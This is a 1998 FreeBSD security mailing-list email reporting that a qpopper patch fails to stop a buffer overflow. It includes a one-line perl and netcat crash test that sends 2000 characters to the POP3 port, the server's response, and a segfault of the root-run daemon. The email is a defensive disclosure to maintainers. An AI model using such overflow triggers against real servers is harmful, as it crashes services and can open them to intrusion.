From owner-freebsd-security  Sun Jun 28 06:43:33 1998
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id GAA22977
          for freebsd-security-outgoing; Sun, 28 Jun 1998 06:43:33 -0700 (PDT)
          (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mars.abcinternet.net (drow@mars.abcinternet.net [151.198.180.7])
          by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA22550;
          Sun, 28 Jun 1998 06:39:58 -0700 (PDT)
          (envelope-from drow@false.org)
Received: (from drow@localhost)
	by mars.abcinternet.net (8.8.8/8.8.8) id JAA03939;
	Sun, 28 Jun 1998 09:47:07 -0400 (EDT)
X-Authentication-Warning: mars.abcinternet.net: drow set sender to drow@false.org using -f
Message-ID: <19980628094706.A3612@abcinternet.net>
Date: Sun, 28 Jun 1998 09:47:06 -0400
From: Dan Jacobowitz <drow@false.org>
To: ache@FreeBSD.ORG, security@FreeBSD.ORG
Subject: qpopper
Mail-Followup-To: ache@freebsd.org, security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.92.4i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

It seems that the latest patch-ag does not successfully address the
problem.  Why, I am not exactly sure - it looks like it should, from
here.  But it _does not_.

[1] mars:/u/drow# perl -e 'print "E"x2000,"\r\nQUIT\r\n";'| nc -i 2 0 110
+OK QPOP (version 2.41beta1) at mars.abcinternet.net starting. 
<3556.899041328@mars.abcinternet.net>
-ERR Unknown command:
"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
[1] mars:/u/drow#


dmesg |tail -1 shows:
pid 3556 (popper), uid 0: exited on signal 11

gdb shows that it is jumping to 0x0 instead of 'eeee', but that is
still a very bad thing for a popper to do.

Daniel Jacobowitz
drow@false.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message